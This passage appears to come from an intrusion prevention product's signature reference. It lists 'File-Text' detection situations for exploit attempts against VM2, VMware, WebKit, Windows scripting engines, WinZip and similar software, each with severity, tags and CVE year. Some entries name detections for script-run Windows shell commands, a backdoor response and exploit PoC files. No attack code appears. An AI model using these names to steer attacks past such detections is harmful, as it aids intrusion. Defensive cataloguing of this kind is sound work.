Tags: Any Operating System, Any Hardware, VM2, CVE2023, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1583-5242
Last changed: sgpkg-ips-1583-5242
Vulnerability: VM2-Sandbox-Protection-Bypass-CVE-2023-30547
Description:
Back to top

File-Text_VM2-Sandbox-Protection-Bypass-With-Code-Transformer-CVE-2023-29199

About this situation: An attempt to exploit a vulnerability in VM2 detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, VM2, CVE2023, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1582-5242
Last changed: sgpkg-ips-1582-5242
Vulnerability: VM2-Sandbox-Protection-Bypass-With-Code-Transformer-CVE-2023-29199
Description:
Back to top

File-Text_VMware-Com-API-ActiveX-Control-Buffer-Overflow

About this situation: An attempt to exploit a buffer overflow vulnerability in VMware VMware COM API ActiveX detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, EMC VMware GSX Server, EMC VMware ESX Server, CVE2008, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-571-5211
Vulnerability: VMware-Com-API-ActiveX-Control-Buffer-Overflow
Description:
Back to top

File-Text_VMware-Fusion-Guest-VM-Remote-Code-Execution

About this situation: An attempt to exploit a vulnerability in VMWare Fusion detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, VMware Fusion, CVE2019, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1150-5242
Last changed: sgpkg-ips-1728-5242
Vulnerability: VMware-Fusion-Guest-VM-Remote-Code-Execution
Description:
Back to top

File-Text_VMware-IntraProcessLogging-DLL-ActiveX-File-Overwrite

About this situation: Attempt to exploit a file overwrite vulnerability in VMware
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, EMC VMware, CVE2007, Windows not specific, EMC VMware not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-571-5211
Vulnerability: VMware-IntraProcessLogging-DLL-ActiveX-File-Overwrite
Description:
Back to top

File-Text_VMware-Remote-Console-HOST-And-MOID-Format-String-Code-Execution

About this situation: An attempt to exploit a code execution vulnerability in VMware Remote Console detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, EMC VMware Remote Console, CVE2009, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-552-5211
Vulnerability: VMware-Remote-Console-HOST-And-MOID-Format-String-Code-Execution
Description:
Back to top

File-Text_VMware-Spring-Cloud-Data-Flow-Skipper-Server-YAML-Insecure-Deserialization

About this situation: An attempt to exploit a vulnerability in VMWare Spring Cloud Data Flow detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, VMWare Spring Cloud Data Flow, CVE2024, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1790-5242
Last changed: sgpkg-ips-1790-5242
Vulnerability: VMware-Spring-Cloud-Data-Flow-Skipper-Server-YAML-Insecure-Deserialization
Description:
Back to top

File-Text_VMware-Vielib-ActiveX-CreateProcess-Command-Execution

About this situation: Attempt to exploit a command execution vulnerability in VMware vielib.dll
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, EMC VMware, CVE2007, Windows not specific, EMC VMware not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-571-5211
Vulnerability: VMware-Vielib-ActiveX-CreateProcess-Command-Execution
Description:
Back to top

File-Text_VMware-Workstation-ActiveX-Control-Vielib.dll-Command-Execution

About this situation: Command execution exploit against VMware Workstation ActiveX Control detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, EMC VMware Workstation, CVE2007, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-551-5211
Vulnerability: VMware-Workstation-ActiveX-Control-Vielib.dll-Command-Execution
Description:
Back to top

File-Text_VMware-Workstation-ActiveX-Partition-Table-Delete-Exploit

About this situation: Attempt to exploit a partition table deletion exploit on VMWare workstation
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, EMC VMware Workstation, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-571-5211
Vulnerability: VMware-Workstation-ActiveX-Partition-Table-Delete
Description:
Back to top

File-Text_Vulnerable-Microsoft-Internet-Explorer-Function-Called

About this situation: Vulnerable Microsoft Internet Explorer function called
Context: Text File Stream
Severity: 7
Tags: Windows, x86, Internet Explorer, MS2007-02, CVE2006, Windows not specific, Internet Explorer not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-721-5211
Vulnerability: HTTP-Microsoft-Internet-Explorer-Adodb.Connection-Execute-Memory-Corruption
Description:
Back to top

File-Text_W3C-Amaya-Web-Browser-Stack-Based-Buffer-Overflow

About this situation: An attempt to exploit a stack based buffer overflow vulnerability in W3C Amaya Web Browser.
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, W3C Amaya, CVE2009, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-665-5211
Last changed: sgpkg-ips-1354-5242
Vulnerability: W3C-Amaya-Web-Browser-Stack-Based-Buffer-Overflow
Description:
Back to top

File-Text_WANRemote-Backdoor-Response

About this situation: WANRemote backdoor response
Context: Text File Stream
Severity: 10
Tags: Windows, Any Hardware, WANRemote, Windows not specific, Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-637-5211
Vulnerability: HTTP-Backdoor-WANRemote
Description:
Back to top

File-Text_Webgate-eDVR-Manager-WESPMonitor-LoadImage-Buffer-Overflow

About this situation: Use of vulnerable method in WebGate eDVR Manager detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, WebGate eDVR Manager, CVE2015, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-639-5211
Last changed: sgpkg-ips-645-5211
Vulnerability: Webgate-Embedded-Standard-Protocol-Multiple-Buffer-Overflows
Description:
Back to top

File-Text_Webgate-Multiple-Products-Wespplaybackctrl-Two-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in WebGate Control Center detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, WebGate Control Center, WebGate eDVR Manager, WebGate WebEyeAudio, WebGate WinRDS, CVE2015, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-645-5211
Last changed: sgpkg-ips-645-5211
Vulnerability: Webgate-Multiple-Products-Wespplaybackctrl-Two-Stack-Buffer-Overflow
Description:
Back to top

File-Text_Webgate-Multiple-Products-WESPSerialPortCtrl-Stack-Buffer-Overflow

About this situation: Use of vulnerable method in WebGate Products detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, WebGate Control Center, WebGate eDVR Manager, WebGate WebEyeAudio, WebGate WinRDS, CVE2015, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-649-5211
Last changed: sgpkg-ips-649-5211
Vulnerability: Webgate-Embedded-Standard-Protocol-Multiple-Buffer-Overflows
Description:
Back to top

File-Text_Webgate-Wespsdk-Wespdiscovery-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in WebGate Control Center detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, WebGate Control Center, WebGate eDVR Manager, WebGate WebEyeAudio, WebGate WinRDS, CVE2015, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-633-5211
Last changed: sgpkg-ips-633-5211
Vulnerability: Webgate-Wespsdk-Wespdiscovery-Stack-Buffer-Overflow
Description:
Back to top

File-Text_WebGrabber-ActiveX-Control-Buffer-Overflow

About this situation: An attempt to exploit a WebGrabber ActiveX Control Buffer Overflow vulnerability detected
Context: Text File Stream
Severity: 7
Tags: Windows XP, Any Hardware, WebGrabber, Windows XP not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-800-5242
Last changed: sgpkg-ips-800-5242
Vulnerability: WebGrabber-ActiveX-Control-Buffer-Overflow
Description:
Back to top

File-Text_Webkit-getImageData-Buffer-Overflow-CVE-2018-12293

About this situation: An attempt to exploit a vulnerability in WebKit detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Webkit, CVE2018, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1771-5242
Last changed: sgpkg-ips-1771-5242
Vulnerability: Webkit-getImageData-Buffer-Overflow-CVE-2018-12293
Description:
Back to top

File-Text_Webkit-Object-Outline-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Webkit HTML rendering engine
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Safari, Chrome, CVE2010, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1771-5242
Vulnerability: Webkit-Object-Outline-Memory-Corruption
Description:
Back to top

File-Text_Webkit-Use-After-Free-CVE-2017-7042

About this situation: An attempt to exploit a vulnerability in WebKit detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Webkit, CVE2017, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1771-5242
Last changed: sgpkg-ips-1771-5242
Vulnerability: Webkit-Use-After-Free-CVE-2017-7042
Description:
Back to top

File-Text_WebRTC-Heap-Buffer-Overflow-CVE-2022-2294

About this situation: An attempt to exploit a vulnerability in WebRTC detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Safari, Chrome, CVE2022, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1673-5242
Last changed: sgpkg-ips-1673-5242
Vulnerability: WebRTC-Heap-Buffer-Overflow-CVE-2022-2294
Description:
Back to top

File-Text_Wecon-Levistudio-Datalogtool-Ini-Parser-Stack-Based-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Wecon LeviStudio detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Wecon LeviStudio, CVE2019, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1152-5242
Last changed: sgpkg-ips-1152-5242
Vulnerability: Wecon-Levistudio-Datalogtool-Ini-Parser-Stack-Based-Buffer-Overflow
Description:
Back to top

File-Text_Wecon-Levistudio-Datalogtool-Stack-Based-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in WECON LeviStudio DataLogTool detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Wecon LeviStudio, CVE2019, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1152-5242
Last changed: sgpkg-ips-1152-5242
Vulnerability: Wecon-Levistudio-Datalogtool-Stack-Based-Buffer-Overflow
Description:
Back to top

File-Text_WellinTech-KingView-SCADA-KVWebSvr.dll-ActiveX-Contorl-Heap-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in WellinTech KingView detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, WellinTech KingView, CVE2011, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-568-5211
Last changed: sgpkg-ips-568-5211
Vulnerability: WellinTech-KingView-SCADA-KVWebSvr.dll-ActiveX-Contorl-Heap-Buffer-Overflow
Description:
Back to top

File-Text_WellinTech-Multiple-Products-Kxclientdownload-ActiveX-Remote-Code-Execution

About this situation: An attempt to exploit a vulnerability in WellinTech KingGraphic detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, WellinTech KingSCADA, WellinTech KingGraphic, CVE2013, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-567-5211
Last changed: sgpkg-ips-567-5211
Vulnerability: WellinTech-Multiple-Products-Kxclientdownload-ActiveX-Remote-Code-Execution
Description:
Back to top

File-Text_Wibukey-Runtime-For-Windows-ActiveX-Control-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Wibu-Systems WibuKey Runtime for Windows detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, WibuKey, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-499-5211
Last changed: sgpkg-ips-630-5211
Vulnerability: Wibu-Systems-Wibukey-Runtime-For-Windows-ActiveX-Control-Buffer-Overflow
Description:
Back to top

File-Text_Windows-Command-Shell-Exec-In-Script

About this situation: A script may attempt to run a Windows shell
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Generic HTTP client, Any Operating System not specific, Generic HTTP client not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1313-5242
Last changed: sgpkg-ips-1313-5242
Description:
Back to top

File-Text_Windows-Elevation-of-Privilege-Vulnerability-CVE-2016-0040

About this situation: An attempt exploit a vulnerability in Microsoft Windows detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2016-02, CVE2016, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-730-5211
Last changed: sgpkg-ips-730-5211
Vulnerability: Windows-Elevation-of-Privilege-Vulnerability-CVE-2016-0040
Description:
Back to top

File-Text_Windows-Environment-Variables-In-Script

About this situation: Multiple calls for Windows Environment Variables in website scripts detected.
Context: Text File Stream
Severity: 2
Tags: Windows, Any Hardware, Windows not specific, Possibly Unwanted Content
First detected in: sgpkg-ips-830-5242
Last changed: sgpkg-ips-830-5242
Vulnerability: Windows-Environment-Variables-In-Script
Description:
Back to top

File-Text_Windows-Help-And-Support-Center-Hcp-Url-System-Compromise

About this situation: Detects Windows HSC dvdupgrade URL
Context: Text File Stream
Severity: 7
Tags: Windows XP, Windows 2003, Any Hardware, Microsoft Help and Support Center, MS2004, CVE2004, Windows XP not specific, Windows 2003 not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: HTTP-Windows-Help-And-Support-Center-Hcp-Url-System-Compromise
Description:
Back to top

File-Text_Windows-Help-And-Support-Center-Hcp-Url-System-Compromise-MS04-011

About this situation: An attempt to exploit a vulnerability in Microsoft Help and Support Center detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Help and Support Center, MS2004, CVE2003, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-418-4219
Last changed: sgpkg-ips-418-4219
Vulnerability: HTTP-Windows-Help-And-Support-Center-Hcp-Url-System-Compromise-MS04-011
Description:
Back to top

File-Text_Windows-HTML-Platforms-Security-Feature-Bypass

About this situation: An attempt to exploit a vulnerability in Windows detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1849-5242
Last changed: sgpkg-ips-1852-5242
Vulnerability: Windows-HTML-Platforms-Security-Feature-Bypass
Description:
Back to top

File-Text_Windows-HTML-Platforms-Security-Feature-Bypass-CVE-2022-24502

About this situation: An attempt to exploit a vulnerability in Windows detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2022-03, CVE2022, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1442-5242
Last changed: sgpkg-ips-1847-5242
Vulnerability: Windows-HTML-Platforms-Security-Feature-Bypass-CVE-2022-24502
Description:
Back to top

File-Text_Windows-HTML-Platforms-Security-Feature-Bypass-CVE-2025-21269

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2025-01, CVE2025, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1824-5242
Last changed: sgpkg-ips-1824-5242
Vulnerability: Windows-HTML-Platforms-Security-Feature-Bypass-CVE-2025-21269
Description:
Back to top

File-Text_Windows-Kernel-cng.sys-Buffer-Overflow-CVE-2020-17087

About this situation: A attempt to exploit a vulnerability in Microsoft Windows detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, CVE2020, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1295-5242
Last changed: sgpkg-ips-1295-5242
Vulnerability: Windows-Kernel-cng.sys-Buffer-Overflow-CVE-2020-17087
Description:
Back to top

File-Text_Windows-Media-Center-RCE-CVE-2015-6127

About this situation: An attempt to exploit a vulnerability in Windows Media Center Detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2015-12, CVE2015, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-711-5211
Last changed: sgpkg-ips-711-5211
Vulnerability: Windows-Media-Center-RCE-CVE-2015-6127
Description:
Back to top

File-Text_Windows-Media-Center-RCE-CVE-2015-6131

About this situation: An attempt to exploit a vulnerability in Windows Media Center Detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2015-12, CVE2015, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-711-5211
Last changed: sgpkg-ips-711-5211
Vulnerability: Windows-Media-Center-RCE-CVE-2015-6131
Description:
Back to top

File-Text_Windows-Media-Player-CVE-2017-0042

About this situation: An attempt to exploit a vulnerability in Windows Media Player
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2017-03, CVE2017, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-863-5242
Last changed: sgpkg-ips-863-5242
Vulnerability: Windows-Media-Player-CVE-2017-0042
Description:
Back to top

File-Text_Windows-Media-Player-Plugin-Embed-Src-Buffer-Overflow

About this situation: Exploit against Windows Media Player via a long SRC field in a HTML embed tag (MS06-006)
Context: Text File Stream
Severity: 10
Tags: Windows, x86, Windows Media Player, MS2006-02, CVE2006, Windows not specific, Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-434-4219
Vulnerability: HTTP-Windows-Media-Player-Plugin-Embed-Src-Buffer-Overflow
Description:
Back to top

File-Text_Windows-MFT-File-Name-Crash

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-926-5242
Last changed: sgpkg-ips-926-5242
Vulnerability: Windows-MFT-File-Name-Crash
Description:
Back to top

File-Text_Windows-Mixed-Reality-Developer-Tools-Information-Disclosure

About this situation: An attempt to exploit a vulnerability in Windows detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2022-10, CVE2022, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1512-5242
Last changed: sgpkg-ips-1513-5242
Vulnerability: Windows-Mixed-Reality-Developer-Tools-Information-Disclosure
Description:
Back to top

File-Text_Windows-MSHTML-Platform-Spoofing-Vulnerability-CVE-2024-38112

About this situation: An attempt to exploit a vulnerability in Windows MSHTML Platform detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2024-07, CVE2024, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1752-5242
Last changed: sgpkg-ips-1752-5242
Vulnerability: Windows-MSHTML-Platform-Spoofing-Vulnerability-CVE-2024-38112
Description:
Back to top

File-Text_Windows-MSHTML-Platform-Spoofing-Vulnerability-CVE-2024-43573

About this situation: An attempt to exploit a vulnerability in Windows MSHTML Platform detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, Microsoft Edge, MS2024-10, CVE2024, Windows not specific, Internet Explorer not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1787-5242
Last changed: sgpkg-ips-1787-5242
Vulnerability: Windows-MSHTML-Platform-Spoofing-Vulnerability-CVE-2024-43573
Description:
Back to top

File-Text_Windows-OLE-Automation-For-VBScript-Scripting-Engine-CVE-2016-3375

About this situation: An attempt to exploit a vulnerability in Windows detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2016-09, CVE2016, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-800-5242
Last changed: sgpkg-ips-800-5242
Vulnerability: Windows-OLE-Automation-For-VBScript-Scripting-Engine-CVE-2016-3375
Description:
Back to top

File-Text_Windows-Out-Of-Bounds-Vulnerability-Poc

About this situation: A file containing a PoC for a Windows Out Of Bounds read vulnerability was detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, CVE2017, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1025-5242
Last changed: sgpkg-ips-1025-5242
Vulnerability: Windows-Out-Of-Bounds-Vulnerability-CVE-2017-11906
Description:
Back to top

File-Text_Windows-Scripting-Engine-Memory-Corruption

About this situation: Detected attempt to exploit a vulnerability in Microsoft Windows
Context: Text File Stream
Severity: 7
Tags: Windows Vista, Windows 2008 R2, Windows 2008, Any Hardware, Internet Explorer, MS2016-06, CVE2016, Windows Vista not specific, Internet Explorer not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-770-5211
Last changed: sgpkg-ips-1334-5242
Vulnerability: Windows-Scripting-Engine-Memory-Corruption-CVE-2016-3205
Windows-Scripting-Engine-Memory-Corruption-CVE-2016-3206
Windows-Scripting-Engine-Memory-Corruption-CVE-2016-3207
Description:
Back to top

File-Text_Windows-Scripting-Engine-Memory-Corruption-CVE-2018-8552

About this situation: An attempt to exploit a vulnerability in Windows Scripting Engine detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 11.0, MS2018-11, CVE2018, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1115-5242
Last changed: sgpkg-ips-1115-5242
Vulnerability: Windows-Scripting-Engine-Memory-Corruption-CVE-2018-8552
Description:
Back to top

File-Text_Windows-Scripting-Languages-Remote-Code-Execution-CVE-2022-41118

About this situation: An attempt to exploit a vulnerability in Windows detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2022-11, CVE2022, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1524-5242
Last changed: sgpkg-ips-1524-5242
Vulnerability: Windows-Scripting-Languages-Remote-Code-Execution-CVE-2022-41118
Description:
Back to top

File-Text_Windows-Shell-Command-Run-By-Script

About this situation: A script runs a Windows shell command
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Generic HTTP client, Any Operating System not specific, Generic HTTP client not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-812-5242
Last changed: sgpkg-ips-812-5242
Description:
Back to top

File-Text_Windows-Shell-Commands-In-Uploaded-File

About this situation: A script runs a Windows shell command
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Generic HTTP client, Windows not specific, Generic HTTP client not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-820-5242
Last changed: sgpkg-ips-820-5242
Description:
Back to top

File-Text_Windows-Shell-Remote-Code-Execution-Vulnerability-CVE-2018-8495

About this situation: An attempt to exploit a vulnerability in Microsoft Edge detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2018-10, CVE2018, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1108-5242
Last changed: sgpkg-ips-1623-5242
Vulnerability: Windows-Shell-Remote-Code-Execution-Vulnerability-CVE-2018-8495
Description:
Back to top

File-Text_Windows-Theme-File-Remote-Code-Execution-Vulnerability

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2013-09, CVE2013, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-542-5211
Last changed: sgpkg-ips-1782-5242
Vulnerability: Windows-Theme-File-Remote-Code-Execution-Vulnerability
Description:
Back to top

File-Text_Windows-Theme-File-VisualStyles-SMB-Path

About this situation: Windows Theme file with a VisualStyles SMB path detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1634-5242
Last changed: sgpkg-ips-1634-5242
Vulnerability: Windows-Theme-File-VisualStyles-SMB-Path
Description:
Back to top

File-Text_Windows-VBScript-Engine-Remote-Code-Execution-CVE-2018-8544

About this situation: An attempt to exploit a vulnerability in Windows VBScript scripting engine detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 11.0, MS2018-11, CVE2018, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1115-5242
Last changed: sgpkg-ips-1115-5242
Vulnerability: Windows-VBScript-Engine-Remote-Code-Execution-CVE-2018-8544
Description:
Back to top

File-Text_Windows-VBScript-Engine-Remote-Code-Execution-Vulnerability-CVE-2018-8625

About this situation: An attempt to exploit a vulnerability in Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2018-12, CVE2018, Windows not specific, Internet Explorer not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1119-5242
Last changed: sgpkg-ips-1332-5242
Vulnerability: Windows-VBScript-Engine-Remote-Code-Execution-Vulnerability-CVE-2018-8625
Description:
Back to top

File-Text_Windows-Visual-Studio-Code-Git-Extension-Argument-Injection

About this situation: An attempt to exploit a vulnerability in Microsoft Visual Studio Code detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Visual Studio Code, CVE2022, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1506-5242
Last changed: sgpkg-ips-1506-5242
Vulnerability: Windows-Visual-Studio-Code-Git-Extension-Argument-Injection
Description:
Back to top

File-Text_Windows-Visual-Studio-Code-Jupyter-Notebook-Remote-Code-Execution

About this situation: An attempt to exploit a vulnerability in Microsoft Visual Studio Code detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Visual Studio Code, CVE2022, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1542-5242
Last changed: sgpkg-ips-1542-5242
Vulnerability: Windows-Visual-Studio-Code-Jupyter-Notebook-Remote-Code-Execution
Description:
Back to top

File-Text_WinZip-CreateNewFolderFromName-ActiveX-Control-Buffer-Overflow

About this situation: Detects buffer overflow exploits against the WinZip FileView ActiveX control
Context: Text File Stream
Severity: 7
Tags: Windows, x86, WinZip, CVE2006, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-870-5242
Vulnerability: WinZip-CreateNewFolderFromName-ActiveX-Control-Buffer-Overflow
Description:
Back to top

File-Text_WinZip-FileView-ActiveX-Control-Buffer-Overflow

About this situation: Detects buffer overflow exploits against the WinZip FileView ActiveX control
Context: Text File Stream
Severity: 7
Tags: Windows, x86, WinZip, MS2006-11, CVE2006, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-571-5211
Vulnerability: HTTP-WinZip-FileView-ActiveX-Control-Buffer-Overflow
Description:
Back to top

File-Text_WinZip-UUDeview-Mime-Archive-Buffer-Overrun

About this situation: An attempt to exploit a vulnerability in WinZip detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, WinZip, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-415-4219
Last changed: sgpkg-ips-612-5211
Vulnerability: WinZip-UUDeview-Mime-Archive-Buffer-Overrun
Description:
Back to top

File-Text_Wireshark-Netscreen-Dissector-Heap-Based-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Wireshark detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Wireshark, CVE2023, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1716-5242
Last changed: sgpkg-ips-1716-5242
Vulnerability: Wireshark-Netscreen-Dissector-Heap-Based-Buffer-Overflow
Description:
Back to top

File-Text_Word-RTF-Listoverridecount-RCE-Multiple-Vulnerabilities

About this situation: An attempt to exploit a vulnerability in Microsoft Word detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Word, Microsoft Word 2010, Microsoft Word 2013, Microsoft Word 2007, Microsoft Word 2003, MS2012-12, MS2014-03, CVE2012, CVE2014, Windows not specific, Microsoft Word not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-574-5211
Last changed: sgpkg-ips-574-5211
